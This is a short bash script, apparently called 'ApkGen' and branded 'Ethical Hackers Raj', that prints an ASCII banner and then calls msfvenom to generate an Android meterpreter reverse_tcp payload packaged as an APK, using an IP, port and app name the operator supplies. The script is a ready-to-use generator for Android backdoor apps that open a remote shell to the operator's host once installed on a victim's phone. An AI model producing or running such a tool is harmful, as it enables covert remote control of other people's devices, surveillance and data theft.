#!/bin/bash
clear
#echo -e "\e[95m"  
echo -e '\e[96m'
echo -e " \e[1m"



echo "================================================"
echo "

   #                   #####
  # #   #####  #    # #     # ###### #    #
 #   #  #    # #   #  #       #      ##   #
#     # #    # ####   #  #### #####  # #  #
####### #####  #  #   #     # #      #  # #
#     # #      #   #  #     # #      #   ##
#     # #      #    #  #####  ###### #    #


        "           By"


"          Rishi Choudhary"
       ~~~~~~~~~~~~~~~~~~~~~~~~~
      |  Ethical Hackers Raj  |
       ~~~~~~~~~~~~~~~~~~~~~~~~~

	Version - dev-1.0 "  



echo "Usage:"
echo "./apkgen <Your Ip> <Your Port> <AppName>"
echo "==============================================="

		

if [ $# -eq 0 ] ; then
    exit 1
fi

msfvenom -p android/meterpreter/reverse_tcp LHOST=$1 LPORT=$2  > $3.apk
